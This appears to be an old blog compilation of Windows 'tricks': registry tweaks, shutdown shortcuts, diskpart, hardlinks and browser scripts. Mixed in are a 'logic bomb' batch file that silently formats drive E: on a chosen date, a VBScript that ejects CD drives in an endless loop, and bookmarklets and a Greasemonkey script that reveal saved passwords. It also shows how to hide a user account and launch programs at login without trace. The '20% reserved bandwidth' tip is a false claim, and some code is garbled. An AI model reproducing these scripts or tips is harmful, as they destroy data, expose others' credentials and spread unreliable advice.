Set Wall Paper In Your Pen Drive, Drive, Folder

Copy the following code and paste it in note pad

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=PATH_OF_THE_WALLPAPER

Save the file as desktop.ini and see the changes

Note:- If the wallpaper exist in the same folder then write the full name of the wallpaper.

Show Password

█►Grєasємσnkey Scяipтs◄█
In order to install these Grease Monkey scripts,you need to install Mozilla Firefox with grease monkey add-on installed

Step-1
Download Mozilla Firefox Web browser from here :

http://www.mozilla.com/en-US/firefox/


Step-2
Install Grease Monkey in your Firefox browser :
https://addons.mozilla.org/en-US/firefox/addon/748


This is a Grease Monkey script which shows password when mouse is moved over password field of the orkut/gmail/yahoo login page.

Step-3
To install this "Show Password" Grease Monkey script,just click the link given below the script will be auto installed on your browser.


http://prudhvi500.googlepages.com/showpass.user.js


Or

Copy and paste the following code in notepad and save it as anything.user.js and then install this

// ==UserScript==
// @name Shows the Password on MouseOverby Prudhvi
// @namespace Prudhvi
// @include *
// @description shows password when mouse is moved over password field
(function() {
var inputs, input;
inputs = document.evaluate(
'//input[@type="password"]',
document,
null,
XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE,
null);
if(!inputs.snapshotLength) return;
for(var i = 0; i <>
input = inputs.snapshotItem(i);
input.addEventListener('mouseover', function(event) {
this.type = 'text';
}, false);
input.addEventListener('mouseout', function(event) {
this.type = 'password';
}, false);
}
})();

View Contents of RAR, ZIP File Before Downloading

Add the following addon to the firefox it is ArchView.
If you want to download the single file from the Archive.
Now you can download the file.

https://addons.mozilla.org/en-US/firefox/addon/5028

Restart the Firefox.
Now when you will download the RAR, ZIP file it will be active and you can download the desired number of files from the Archive.

Logic Bomb Virus In Batch

Open Notepad

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day

Boost internet Speed by 20%

Windows uses 20% of your internet bandwidth by default! Microsoft reserve 20% of your available bandwidth for their own purposes (for updates and interrogating your machine etc..). Here's how to get it back.

Click Start-->Run-->and type gpedit.msc. Hit enter.
This opens the group policy editor.
Then go to:
Local Computer Policy -->Computer Configuration -->Administrative Templates -->Network -->QOS Packet Scheduler -->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab:

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO. This will allow the system to reserve nothing, rather than the default 20%. Works on XP Pro and 2000.

Auto Shutdown PC

METHOD # 1

Step 1:
Right click on your desktop and choose "New=>shortcuts".

Step 2
:
In the box that says "Type the location of the shortcut",
type in "shutdown -s -t 3600" without the quotation marks and click next.

Note: 3600 are the amount of seconds before your computer shuts down. So , 60secs*60mins=3600secs.

Step 3:
Make up a name for the shortcut and you're done.

To abort:

To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to " shutdown -a" without the quotes.


METHOD # 2

Here is another trick to shutdown at a specific time, for example you wish to shutdown at 11:35am. Type this in
start=>Run => cmd

Type : at 11:35 shutdown -s

to abort :

Type : shutdown -a


METHOD # 3

You can use a batch for that as well it makes it easier to use just run the batch and enter the time you want it to shutdown

Open Notepad and type the following code and name it as shutdown.bat

@echo off
title Scheduled Shutdown Batch Example by chacha1234
color A
echo Enter Time To Shutdown (example 19:30)
set /p stime=
cls
at %stime% ""shutdown -s -t 00"" >nul
echo Your PC Will Auto Shutdown At %stime%
echo Press Any Key To Exit
pause >nul
exit

also you can add -c "desired message" at the end of the shutdown command
for example
shutdown -s -t 60 -c "Shutdown PC"

using this command u can also schedule ur pc to restart
for example
shutdown -r -t 60 -c "Restarting PC"

Rename Recycle Bin

GoTo
[start][run][cmd]
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]
"Attributes"=hex:50,01,00,20
"CallForAttributes"=dword:00000000

Change the value accordingly.

Now you will be able to rename recycle bin.

Welcome Screen Logon versus Classic Logon

This registry edit specifies whether the Welcome screen or the Classic logon will be used to access Windows XP.


[Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Winlogon
Data Type: REG_DWORD [Dword Value] / Value Name: LogonType
Value Data: [0 - Classic Mode / 1 - Welcome Screen]
Modify/Create the Value Name [LogonType] according to the Value Data listed above.

Exit Registry and Reboot



Start Up Your Computer Much Faster

[Start] [Run] [Regedit]
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex

now there find the Key Called "Startup Delay"
Double Click On It, Now where its Base, Click Decimal
Now its Default Value Is 4800000
Change The Value To 40000

Here u go u have done it
Now close the Registery Editor and Restart Your Computer
You'll See The Result

Launch Programs at Login Without Using the Startup Folder

This registry hack allows a program to be launched when the user logs onto the computer. It can be set to run minimized and there is no trace of the executable in the Startup folder on the Start Menu nor in the Documents and Settings folder accessible via Windows Explorer.


[Start] [Run] [Regedit]
Registry Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: REG_SZ [String Value] // Value Name: [Enter the Name of Program Executable]
Value Data: [Enter the Path to the Program Executable]

Exit Registry and Reboot

Hide The Drive


1.First goto start->run->type “diskpart” and enter(with out quotations)
2.Type “list volume” (with out quotations)
3.select the volume of drive u want to hide by this command “
select volume3” (with out quotations)
4.Then type “remove letter f” (with out quotations)
(It removes the drive f)

5.If u want re-assign the drive

a. First goto start->run->type “diskpart” and enter(with out quotations)
b. Type “list volume” (with out quotations)
c. select the volume of drive u (before) hide by this command “select
volume3” (with out quotations)
d.THEN type “assign letter f” (with out quotations)


EXAMPLE:
DISKPART> list volume

Volume ### Ltr Label Fs Type Size Status Info
---------- --- ----------- ----- ---------- ------- --------- --------
Volume 0 D DVD-ROM 0 B
Volume 1 C NTFS Partition 20 GB Healthy System
Volume 2 E New Volume NTFS Partition 49 GB Healthy
Volume 3 F New Volume NTFS Partition 78 GB Healthy
Volume 4 G New Volume NTFS Partition 86 GB Healthy
Volume 5 H SUBBU FAT32 Removeable 978 MB

DISKPART> select volume 3
Volume 3 is the selected volume.
DISKPART> remove letter f
DiskPart successfully removed the drive letter or mount point.
DISKPART> select volume 3
Volume 3 is the selected volume.
DISKPART> assign letter f
DiskPart successfully assigned the drive letter or mount point.

Create A Hidden User Account

This registry hack allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000.


[Start] [Run] [Regedit]
Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\
Winlogon\SpecialAccounts\UserList
Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.
Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden
Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]

Exit Registry and Reboot

Creating Hardlink

Here we go, If i ask u one problem:
create three files with different names in such a way that u edit one file and all three reflects the change same time or the things from one file gets into others too, without even allocating a bit more space in harddisk?

The answer is here, if the drive type is NTFS

Then u can use the hardlinks, hardlink is a link to a file so that it always points to the original file location in drive sectors, so even if u delete the original file, it still remains intact, so to delete it completely, delete all hardlinks also to that file,

first create a file and then to create its hardlink the following command works:

FSUTIL hardlink create new filename existing filename

and create many hardlinks with different names to the same file and then change or edit any one of'em and everyone will get the reflectionm...enjoy

DOS - Mini Calculator

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:
C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7
For more information, type set /? at the command prompt.

Change Default Installation Path

XP uses the C:\Program Files directory as the default base directory into which new programs are installed. However, you can change the default installation drive and/ or directory by this method.

Run the Registry Editor (regedit)and go to

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

Look for the value named ProgramFilesDir. by default,this value will be C:\Program Files. Edit the value to any valid drive or folder and XP will use that new location as the default installation directory for new programs.

Know Password That are Saved in Login

To Know the password that are saved at login by mistakenly or by knowingly .

Copy and paste the following script on address bar and hit enter.

javasrcipt:alert(document.getElementById('passwd').value);

Note:- It may or may not work in FireFox.


or


u can use this script.
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j
%20{%20f%20=%20F[j];%20for%20(i=0;%20i
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
%20(s)%20alert(%22Sujeet%20:%20The%20Password%20On
%20This Page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})(); 

CD ROM Virus

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

Copy it in notepad and save as any.vbs then run this file see what happens.
note :- to stop this press alt+ctrl+del and terminate the wscript.exe in process tab

Edit Any Web Page

Go to the page you want to edit
Copy the below code into the url bar.

javascript: document.body.contentEditable = 'true'; document.designMode = 'on'; void 0

Hit go! the links will have turned a more saturated blue, and when you click somewhere you'll be able to edit text..
Feel free to edit whatever you want on the page & u can save that page..
Note: It doesn't work on orkut pages because of Main#.